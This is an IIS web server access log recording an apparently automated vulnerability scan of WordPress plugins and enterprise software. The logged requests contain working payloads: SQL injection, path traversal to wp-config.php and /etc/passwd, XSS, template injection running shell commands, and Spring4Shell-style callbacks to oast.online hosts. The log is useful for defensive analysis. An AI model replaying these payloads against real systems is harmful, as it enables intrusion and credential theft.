2023-10-13 20:02:52 103.153.214.94 POST /wp-admin/admin-ajax.php - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 405 0 1 207
2023-10-13 20:02:55 103.153.214.94 GET /wp-content/plugins/infographic-and-list-builder-ilist/assets/js/ilist_custom_admin.js - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 211
2023-10-13 20:03:05 103.153.214.94 POST /wp-admin/admin-ajax.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 405 0 1 204
2023-10-13 20:03:43 103.153.214.94 POST /wp-admin/admin-ajax.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 405 0 1 206
2023-10-13 20:05:34 103.153.214.94 POST /wp-admin/admin-ajax.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 405 0 1 208
2023-10-13 20:05:37 103.153.214.94 GET /wp-content/plugins/documentor-lite/core/js/documentor.js - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 206
2023-10-13 20:05:57 103.153.214.94 POST /wp-admin/admin-ajax.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 405 0 1 206
2023-10-13 20:06:18 103.153.214.94 POST /wp-admin/admin-ajax.php - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 405 0 1 780
2023-10-13 20:08:59 103.153.214.94 GET /wp-admin/admin-ajax.php action=get_monthly_timetable&month=1+AND+(SELECT+6881+FROM+(SELECT(SLEEP(6)))iEAn) 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 209
2023-10-13 20:11:30 103.153.214.94 GET /wp-admin/admin-ajax.php action=ajax_get&route_name=get_doctor_details&clinic_id=%7B"id":"1"%7D&props_doctor_id=1,2)+AND+(SELECT+42+FROM+(SELECT(SLEEP(6)))b 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 215
2023-10-13 20:12:54 103.153.214.94 GET /index.php rest_route=/xs-donate-form/payment-redirect/3 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 207
2023-10-13 20:15:41 103.153.214.94 POST /wp-admin/admin-ajax.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 405 0 1 210
2023-10-13 20:15:46 103.153.214.94 POST /wp-admin/admin-ajax.php - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 405 0 1 204
2023-10-13 20:15:52 103.153.214.94 POST /wp-admin/admin-ajax.php - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 405 0 1 202
2023-10-13 20:17:01 103.153.214.94 POST /wp-admin/admin-ajax.php - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 405 0 1 209
2023-10-13 20:20:26 103.153.214.94 POST /wp-admin/admin-ajax.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 213
2023-10-13 20:20:28 103.153.214.94 GET /wp-content/plugins/arprice-responsive-pricing-table/js/arprice.js - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 210
2023-10-13 20:21:04 103.153.214.94 GET /user/login - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 208
2023-10-13 20:21:28 103.153.214.94 GET /wp-admin/admin-ajax.php action=memberhero_send_form&_memberhero_hook=phpinfo 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 212
2023-10-13 20:22:52 103.153.214.94 GET /user/login/ next=https%3A%2F%2Finteract.sh 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 207
2023-10-13 20:22:54 103.153.214.94 GET /user/logout next=https%3A%2F%2Finteract.sh 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 205
2023-10-13 20:22:56 103.153.214.94 GET /user/register next=https%3A%2F%2Finteract.sh 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 209
2023-10-13 20:22:58 103.153.214.94 GET /user/resend-activation next=https%3A%2F%2Finteract.sh 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 207
2023-10-13 20:24:12 103.153.214.94 POST / rest_route=/olistener/new 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 405 0 1 218
2023-10-13 20:24:14 103.153.214.94 GET /wp-content/plugins/woc-order-alert/assets/admin/js/scripts.js - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 205
2023-10-13 20:25:12 103.153.214.94 POST /wp-admin/admin-ajax.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 405 0 1 208
2023-10-13 20:25:14 103.153.214.94 POST /wp-admin/admin-ajax.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 405 0 1 204
2023-10-13 20:25:16 103.153.214.94 GET /wp-content/plugins/stopbadbots/assets/js/stopbadbots.js - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 204
2023-10-13 20:25:47 103.153.214.94 POST /wp-json/click5_sitemap/API/update_html_option_AJAX - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 405 0 1 206
2023-10-13 20:25:50 103.153.214.94 POST /wp-json/click5_sitemap/API/update_html_option_AJAX - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 405 0 1 204
2023-10-13 20:25:53 103.153.214.94 POST /wp-json/click5_sitemap/API/update_html_option_AJAX - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 405 0 1 205
2023-10-13 20:31:51 103.153.214.94 POST /wp-admin/admin-ajax.php - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 405 0 1 210
2023-10-13 20:33:15 103.153.214.94 POST /wp-admin/admin-ajax.php action=wpt_admin_update_notice_option 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 405 0 1 210
2023-10-13 20:34:36 103.153.214.94 POST /userportal/Controller mode=8700&operation=1&datagrid=179&json={"%f0%9f%a6%9e":"test"} 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 405 0 1 207
2023-10-13 20:34:44 103.153.214.94 GET /wp-admin/admin.php page=rsvp-admin-export 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 204
2023-10-13 20:35:09 103.153.214.94 GET /wp-admin/admin-ajax.php action=vtprd_product_search_ajax&term=aaa%27+union+select+1,sleep(6),3--+- 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 204
2023-10-13 20:35:42 103.153.214.94 GET /wp-content/plugins/simple-file-list/includes/ee-downloader.php eeFile=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/wp-config.php 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 208
2023-10-13 20:35:42 103.153.214.94 GET /user/login - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 204
2023-10-13 20:36:25 103.153.214.94 GET /plugins/jobsearch/ search_title=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28domain%29%3E&ajax_filter=true&posted=all&sort-by=recent 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 208
2023-10-13 20:38:52 103.153.214.94 GET /wp-content/plugins/gwyns-imagemap-selector/popup.php id=1&class=%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 208
2023-10-13 20:38:54 103.153.214.94 GET /wp-content/plugins/gwyns-imagemap-selector/popup.php id=1%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 204
2023-10-13 20:39:24 103.153.214.94 POST /wp-admin/admin-ajax.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 https://bcvt.kontum.gov.vn 405 0 1 205
2023-10-13 20:43:12 103.153.214.94 GET /wp-content/plugins/admin-word-count-column/download-csv.php path=../../../../../../../../../../../../etc/passwd\0 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 636
2023-10-13 20:43:51 103.153.214.94 POST /mgmt/tm/util/bash - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 405 0 1 207
2023-10-13 20:46:20 103.153.214.94 GET /wp-content/plugins/cab-fare-calculator/tblight.php controller=../../../../../../../../../../../etc/passwd%00&action=1&ajax=1 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 215
2023-10-13 20:48:21 103.153.214.94 GET /wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php p=tout 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 212
2023-10-13 20:53:02 103.153.214.94 GET /module/ module=%27onm%3Ca%3Eouseover=alert(document.domain)%27%22tabindex=1&style=width:100%25;height:100%25;&id=x&data-show-ui=admin&class=x&from_url=https://bcvt.kontum.gov.vn 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 214
2023-10-13 20:54:08 103.153.214.94 GET /wp-json/metform/v1/forms/templates/0 - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 216
2023-10-13 20:55:50 103.153.214.94 HEAD /wp-login.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 209
2023-10-13 20:55:52 103.153.214.94 POST /wp-admin/admin.php page=html2wp-settings 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 209
2023-10-13 20:55:52 103.153.214.94 HEAD /wp-login.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 209
2023-10-13 20:55:54 103.153.214.94 GET /wp-content/uploads/html2wp/2WfF0ZwSAC4PpRdIdQT6vHcUwqx.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 205
2023-10-13 20:56:20 103.153.214.94 POST /wp-admin/admin-ajax.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:100.0)+Gecko/20100101+Firefox/100.0 - 405 0 1 209
2023-10-13 20:56:23 103.153.214.94 POST /wp-admin/admin-ajax.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:100.0)+Gecko/20100101+Firefox/100.0 - 405 0 1 839
2023-10-13 20:56:37 103.153.214.94 GET /wp-json/wp/v2/asked-question - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 207
2023-10-13 20:56:51 103.153.214.94 POST /wp-json/am-member/license - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 405 0 1 205
2023-10-13 20:57:47 103.153.214.94 GET /proxy url=http%3a//0:8080/ 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 207
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-10-13 21:00:51
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-10-13 21:00:51 103.153.214.94 GET /wp-admin/admin-ajax.php action=swpm_validate_email&fieldId=%22%3Cscript%3Ealert(document.domain)%3C/script%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 214
2023-10-13 21:03:37 103.153.214.94 POST /wp-json/rsvpmaker/v1/stripesuccess/anythinghere - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 405 0 1 213
2023-10-13 21:03:43 103.153.214.94 GET /service/0/test.oast.me - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 204
2023-10-13 21:07:03 103.153.214.94 GET /api/search/attribute versionid=*&tf_version=%27+and+(select%20pg_sleep(10))+ISNULL-- 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 0 2 225
2023-10-13 21:07:05 103.153.214.94 POST /wp-admin/admin-ajax.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 405 0 1 209
2023-10-13 21:08:39 103.153.214.94 GET /wp-admin/admin-ajax.php action=ptp_design4_color_columns&post_id=1&column_names=<script>alert(document.domain)</script> 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 213
2023-10-13 21:10:12 103.153.214.94 GET /wp-admin/admin-ajax.php action=dprv_log_event&message=%3Cscript%3Ealert(document.domain)%3C/script%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 208
2023-10-13 21:10:26 103.153.214.94 GET /wp-admin/admin-ajax.php action=aux_the_recent_products&data[wp_query_args][post_type]=post&data[title]=%3Cscript%3Ealert(document.domain)%3C/script%3E 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 205
2023-10-13 21:10:49 103.153.214.94 GET /wp-admin/admin-ajax.php action=woot_get_smth&what={%22call_action%22:%22x%22,%22more_data%22:%22\u003cscript%3Ealert(document.domain)\u003c/script%3E%22} 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 205
2023-10-13 21:13:36 103.153.214.94 GET /wp-admin/admin-ajax.php action=cdi_collect_follow&trk=%3Cscript%3Ealert(document.domain)%3C/script%3E 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 205
2023-10-13 21:17:02 103.153.214.94 GET /wp-admin/admin-ajax.php action=wpda_gall_load_image_info&start=0&limit=1&gallery_current_index=<script>alert(document.domain)</script> 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 208
2023-10-13 21:19:11 103.153.214.94 POST /wp-admin/admin-ajax.php - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 405 0 1 209
2023-10-13 21:19:13 103.153.214.94 GET /wp-admin/admin-ajax.php action=easync_success_and_save 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 208
2023-10-13 21:21:08 103.153.214.94 GET /OA_HTML/ibeCAcpSSOReg.jsp - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 207
2023-10-13 21:22:55 103.153.214.94 POST /OA_HTML/BneViewerXMLService bne:uueupload=TRUE 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 405 0 1 207
2023-10-13 21:22:58 103.153.214.94 GET /OA_CGI/FNDWRR.exe - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 208
2023-10-13 21:23:00 103.153.214.94 POST /OA_HTML/BneViewerXMLService bne:uueupload=TRUE 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 405 0 1 864
2023-10-13 21:24:04 103.153.214.94 POST /wp-admin/admin-ajax.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 405 0 1 211
2023-10-13 21:24:40 103.153.214.94 GET /wp-admin/options-general.php page=cf7sr_edit&"></script><script>alert(document.domain)</script> 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 205
2023-10-13 21:24:56 103.153.214.94 GET /backend/backend/auth/signin - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 207
2023-10-13 21:26:02 103.153.214.94 GET /error.php SERVER_NAME=<script>alert(document.domain)</script> 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 206
2023-10-13 21:27:53 103.153.214.94 POST /api/login - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 237
2023-10-13 21:29:56 103.153.214.94 GET /custom/<img+src=x+onerror=alert(document.domain)> - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 210
2023-10-13 21:29:58 103.153.214.94 GET /share/api/notes/<img+src=x+onerror=alert(document.domain)> - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 203
2023-10-13 21:30:01 103.153.214.94 GET /share/api/images/<img+src=x+onerror=alert(document.domain)>/filename - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 204
2023-10-13 21:30:22 103.153.214.94 GET /sap/admin/public/default.html - 443 - 193.123.37.162 - - 200 0 0 247
2023-10-13 21:30:22 103.153.214.94 GET / - 443 - 193.123.37.162 - - 200 0 0 252
2023-10-13 21:30:31 103.153.214.94 POST /actuator/gateway/routes/2WfF0nnAdLwaDChnWHfzUvw0ym4 - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 405 0 1 206
2023-10-13 21:30:34 103.153.214.94 POST /actuator/gateway/refresh - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 810
2023-10-13 21:30:34 103.153.214.94 GET /sap/public/bc/ur/Login/assets/corbu/sap_logo.png - 443 - 193.123.37.162 - - 200 0 0 247
2023-10-13 21:30:34 103.153.214.94 GET / - 443 - 193.123.37.162 - - 200 0 0 248
2023-10-13 21:30:36 103.153.214.94 DELETE /actuator/gateway/routes/2WfF0nnAdLwaDChnWHfzUvw0ym4 - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 405 0 1 203
2023-10-13 21:30:36 103.153.214.94 GET /catalog-portal/ui/oauth/verify error&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%68%6f%73%74%73%22%29%7d 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 203
2023-10-13 21:30:43 103.153.214.94 POST /functionRouter - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 405 0 1 203
2023-10-13 21:33:49 103.153.214.94 POST / - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 405 0 1 834
2023-10-13 21:33:51 103.153.214.94 GET / class.module.classLoader.resources.context.configFile=http://ckjv7uic8b6p3donsoogq78b3r6xtk778.oast.online&class.module.classLoader.resources.context.configFile.content.aaa=xxx 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 207
2023-10-13 21:33:54 103.153.214.94 POST / - 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 405 0 1 812
2023-10-13 21:33:56 103.153.214.94 GET / class.module.classLoader.resources.context.configFile=https://ckjv7uic8b6p3donsoogf8cbw3nejpiof.oast.online&class.module.classLoader.resources.context.configFile.content.aaa=xxx 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 205
2023-10-13 21:34:42 103.153.214.94 GET /wbm/login/ next=https%3A%2F%2Finteract.sh 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 211
